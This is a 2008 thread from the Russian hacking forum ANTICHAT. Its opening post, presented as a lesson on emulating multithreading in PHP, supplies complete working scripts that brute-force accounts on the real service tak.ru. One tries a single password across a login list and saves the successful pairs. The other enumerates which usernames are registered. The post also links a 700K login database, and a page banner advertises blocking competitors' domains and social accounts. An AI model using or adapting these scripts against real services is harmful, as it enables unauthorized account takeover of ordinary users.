УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Эмуляция многопоточности в php на основе брутера Tak.ru

Опции темы

Поиск в этой теме

Опции просмотра

Эмуляция многопоточности в php на основе брутера Tak.ru

17.05.2008, 23:08

$Аватар для !{ra!{e/\/$

~~!{ra!{e/\/~~

Banned

Регистрация: 27.08.2007

Сообщений: 159

Провел на форуме:
994336

Репутация: 171

$Отправить сообщение для !{ra!{e/\/ с помощью ICQ$

Эмуляция многопоточности в php на основе брутера Tak.ru

Эмуляция многопоточности в php на основе брутера Tak.ru
Теория
Часто возникают ситуации когда требуется быстро обработать информацию. Допустим, при работе с несколькими десятками,сотнями файлов. Скорость выполнения программы можно значительно ускорить, если выполнять их в несколько потоков. В PHP нет возможности организовать реальную многопоточность, но ее можно сделать если извернуться.

Эмуляция многопоточности
Как пример возьмем привычную задачу – брут. Работать будем с сокетами . Многопоточность “симулируюм” с помощью пула не блокирующих сокетов. Брутить будем пароли от учетных записей Tak.ru. Комменты и обьяснения в самом скрипте. Ответ скрипта на правильную пару login+pass “302 Found”(этого нам достаточно).Для работы скрипта создадим файл logins.txt с логинами в той же категории. Максимальное число потоков не рекомендую ставить слишком большим.

PHP код:


		
			
<?php

$max_threads = 5;//Максимальное количество потоков

set_time_limit(320); // лимит времени на выполнение. Я поставил 320 сукунд

$get_array=file("logins.txt"); // массив из логинов 

for($i=0,$cnt=count($get_array);$i<$cnt;$i++)  // удаляем символы перевода каретки

{

  $get_array[$i]=trim($get_array[$i]);

}

$pass="pass"; // пароль на который будем подбирать логины

$f=fopen("pass_list.txt",'w'); // сюда будем записывать сбрученные логин+пасс

echo("Всего запросов: " . count($get_array) . "<BR> Поехали! <BR>");

$sockets = array(); //В этом массиве находятся открытые сокеты

$done = false;// Флаг $done используется для остановки скрипта после выполнения работы

$curr = 0; // $curr - будет текущим элементом из всего массива запросов

while (!$done)

    {

    while (($max_threads > count($sockets)) && ($curr < count($get_array))) // Если количество активных сокетов меньше константы и $curr не превысил допустимые нормы, то запускаем скрипт, который создает недостающее количество сокетов

        {

           $packet.="POST /enter.php HTTP/1.0\r\n";

        $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/pdf, application/x-shockwave-flash, */*\r\n";

        $packet.="Accept-Language: ru\r\n";

        $packet.="Content-Type: application/x-www-form-urlencoded\r\n";

        $packet.="Host: web.tak.ru\r\n";

        $packet.="Content-Length: 52\r\n";

        $packet.="Pragma: no-cache\r\n";

        $packet.="Connection: Keep-Alive\r\n\r\n";

        $packet.="login=$get_array[$curr]&password=$pass&Submit=++OK++&z=enter_form";

    

        $errno = 0;

        $error = "";

        $sockets[$curr] = fsockopen("web.tak.ru",80);// открываем новый сокет

        //stream_set_blocking($sockets[$curr], 0);

        stream_set_timeout($sockets[$curr], 3600);

        fputs($sockets[$curr], $packet);// Посылаем в этот сокет наш запрос

        echo("Создан сокет: " . $curr . "<br>");

        $curr = $curr + 1;// Переходим к следующему элементу массива

        unset($packet);

        }

////sleep(1);// Чтобы не сильно загружать сервер будем проверять данные по всем сокетам через 1 секунду

foreach($sockets as $key => $val) 

    {



    $temp[$key].= fgets($sockets[$key],50); // Получаем данные из текущего сокета [ данных может и не быть ] 50 нам достаточно чтоб определить правильно или нет(экономим трафик и время)

        echo $temp[$key];

    unset($sockets[$key]); //то удаляем отработавший сокет из массива

    echo("Удален сокет: " . $key . "<br>");

    

   }

///echo("Сейчас обрабатывается: " . count($sockets) . " сокетов<BR>");



// если нет активных сокетов, то можно выходить

if (count($sockets) == 0) $done = true;

    }

foreach($temp as $key => $val) 

{

   if ((strpos($temp[$key],"302 Found"))>0) { fputs($f,$get_array[$key].":".$pass."\r\n"); echo " $get_array[$key]  $pass-- Пароль правильный";}

  else echo " $get_array[$key]  $pass--Не правильный пароль ";

   }

fclose($f);

echo("<br> Конец");

 ?>

В дополнении
Чтоб приступить к бруту нужны базы логинов. Если просто в logins.txt вписать какую нибудь базу логинов то работать все же будет но это будет неудобно,больше ненужных запросов т.е трафика и времени поэтому в приложении выкладываю скрипт для отсеивания логинов.
Для работы скрипта создаем файл logins.txt с базой логингов. После завершения работы скрипта зарегистрированные логины отсеются в файл regger_logins.txt

PHP код:


		
			
<?php

$tak_names=file("logins.txt");



for($i=0,$cnt=count($tak_names);$i<$cnt;$i++)

{

  $tak_names[$i]=trim($tak_names[$i]);

}

echo "Начало работы";



$f=fopen("regger_logins.txt",'w');

foreach($tak_names as $key => $val) 

{

$packet.="POST /registuser.php HTTP/1.0\r\n";

$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/pdf, application/x-shockwave-flash, */*\r\n";

$packet.="Accept-Language: ru\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

$packet.="Host: web.tak.ru\r\n";

$packet.="Content-Length: 136\r\n";

$packet.="Pragma: no-cache\r\n";

$packet.="Cookie: PHPSESSID=7d60872b57f6dea13ff6eba120cf8e12";

$packet.="Connection: Keep-Alive\r\n\r\n";

$packet.="login=$tak_names[$key]&name=13&email=sed@rambller.ru&password=123456&passwordtoo=123456&reg=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF";

$ock=fsockopen("web.tak.ru",80);

fputs($ock,$packet);

$html='';

//while (!feof($ock))

//{

$html.=fgets($ock,1000);// этого достаточно

sleep(0.05);

//}

echo $html."   <br>  ";



fclose($ock);

unset($ock);

unset($packet);

echo "<br>";

if ((strpos($html,"302 Found"))>0) echo "$tak_names[$key] Не зарегистрирован";

else { fputs($f,$tak_names[$key]."\r\n"); 

      echo "$tak_names[$key] Зарегистрирован ";

      }

}

fclose($f);

?>

В заключении
Почему я подбираю логины к паролю а не наоборот? При восстановлении пароля tak.ru высылает свой пароль из 7 символов содержащих цифры и буквы латинского алфавита(нижние регистры), это увеличивает вероятность(шанс) на подбор.
Скрипт полностью работоспособный, писал сам.
Базу логинов можно скачать отсюда http://slil.ru/25776569 700К логинов(за базы спасибо AdReNa1!Ne).
Целью моей работы было показать один из способов увеличения скорости работы в PHP.
(судить не строго моя первая сатья)

17.05.2008, 23:34

fucker"ok

Познавший АНТИЧАТ

Регистрация: 21.11.2004

Сообщений: 1,137

Провел на форуме:
2487541

Репутация: 761

Ох. Сейчас опять начнется хоули варз...

Имхо. Что-то похожее было. Не помню к чему тогда пришли дебаты. Думаю что это все-равно будет в раз медленнее.

Код:

 $sockets[$curr] = fsockopen("web.tak.ru",80);

Обращение по домену. Если DNS говеный, то будет подвисать.
Особо в код не вчитывался, как понял вначале отсылаем посты, потом получаем. Опять же, если где-то заступорит, то вся "многопоточность" здохнет. :'(

Последний раз редактировалось fucker"ok; 17.05.2008 в 23:45..

17.05.2008, 23:51

$Аватар для !{ra!{e/\/$

~~!{ra!{e/\/~~

Banned

Регистрация: 27.08.2007

Сообщений: 159

Провел на форуме:
994336

Репутация: 171

$Отправить сообщение для !{ra!{e/\/ с помощью ICQ$

Цитата:

Сообщение от fucker"ok

Опять же, если где-то заступорит, то вся "многопоточность" здохнет. :'(

..если я правильно понял где-то то если и не писать многопоточный то скрипт здохнет....а если где-то касается именно "многопоточности" то все будет работать хорошо...

18.05.2008, 00:02

$Аватар для !{ra!{e/\/$

~~!{ra!{e/\/~~

Banned

Регистрация: 27.08.2007

Сообщений: 159

Провел на форуме:
994336

Репутация: 171

$Отправить сообщение для !{ra!{e/\/ с помощью ICQ$

Цитата:

Сообщение от fucker"ok

Особо в код не вчитывался, как понял вначале отсылаем посты, потом получаем.

В этом случае оно так потому что мы не читаем все ..нам достаточно первых 50 при этом зависание маловероятно....
Если надо будет читать полностью то

PHP код:


		
			
как понял вначале отсылаем посты, потом получаем

это чуть перепишется не так... и будет работать на ура

18.05.2008, 00:13

fucker"ok

Познавший АНТИЧАТ

Регистрация: 21.11.2004

Сообщений: 1,137

Провел на форуме:
2487541

Репутация: 761

Заступорить может при чтении ответа из сокета или при конверте dns в ip. (Уж не знаю, есть ли там встроенное кеширование)
Например тут fgets($sockets[$key],50);

Последний раз редактировалось fucker"ok; 18.05.2008 в 00:15..

18.05.2008, 00:17

$Аватар для !{ra!{e/\/$

~~!{ra!{e/\/~~

Banned

Регистрация: 27.08.2007

Сообщений: 159

Провел на форуме:
994336

Репутация: 171

$Отправить сообщение для !{ra!{e/\/ с помощью ICQ$

Цитата:

Сообщение от fucker"ok

К многопоточности это особо не касается....А что ты посоветуешь сделать?

29.05.2008, 13:33

Karapuziko

Познающий

Регистрация: 20.01.2008

Сообщений: 47

Провел на форуме:
71868

Репутация: 72

отстой а не статья

!в моа рвемся???
----------
Показал бы обход капч

, или реггер какой нить, или свой суперпупер мега эксплойт показал бы

- скучно, мне жаль тебя

29.05.2008, 15:14

desTiny

Reservists Of Antichat - Level 6

Регистрация: 04.02.2007

Сообщений: 1,152

Провел на форуме:
3008839

Репутация: 1502

Так-с... Я вот что подумал...
А что, если собрать недетерминированный аппарат, то есть - создаём скрипт, ну, к примеру перебрающий пассы от 1 до n. А он пишет 2 файла, перебирающие от 1 до [n/2] и от [n/2]+1 до n и вызывает их, и т.д.... вот вам и многопоточность - в итоге за каждые m пассов бкдет отвечать одн файл, а все они запущены...

__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ

31.05.2008, 21:01

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

очень старая тема, на ачате уже подобная статья была. Неблокирующие сокеты это не многопоточность, а лишь подобие.

Цитата:

А что, если собрать недетерминированный аппарат, то есть - создаём скрипт, ну, к примеру перебрающий пассы от 1 до n. А он пишет 2 файла, перебирающие от 1 до [n/2] и от [n/2]+1 до n и вызывает их, и т.д.... вот вам и многопоточность - в итоге за каждые m пассов бкдет отвечать одн файл, а все они запущены...

тоже известный способ, наибольший эффект достигается при использовании proc_open(), с помощью которого в *nix создаются чайлды. Но опять же, не смотря на парраллельность, доступа к переменным чайлдов из главного скрипта не получить, т.е. говорить о настоящей многопоточности не приходится.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP, PERL, MySQL, JavaScript	186	21.02.2010 02:41
BookS: PHP, PERL, MySQL, JavaScript, HTML, ajax, Веб Дизайн	M1nK0	PHP, PERL, MySQL, JavaScript	10	27.06.2009 21:35
Что такое Php?	PAPA212	Болталка	13	28.12.2007 20:44
Безопасность в Php, Часть Iii	k00p3r	Чужие Статьи	0	11.07.2005 19:02
Защищаем Php. Шаг за шагом.	k00p3r	Чужие Статьи	0	13.06.2005 11:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход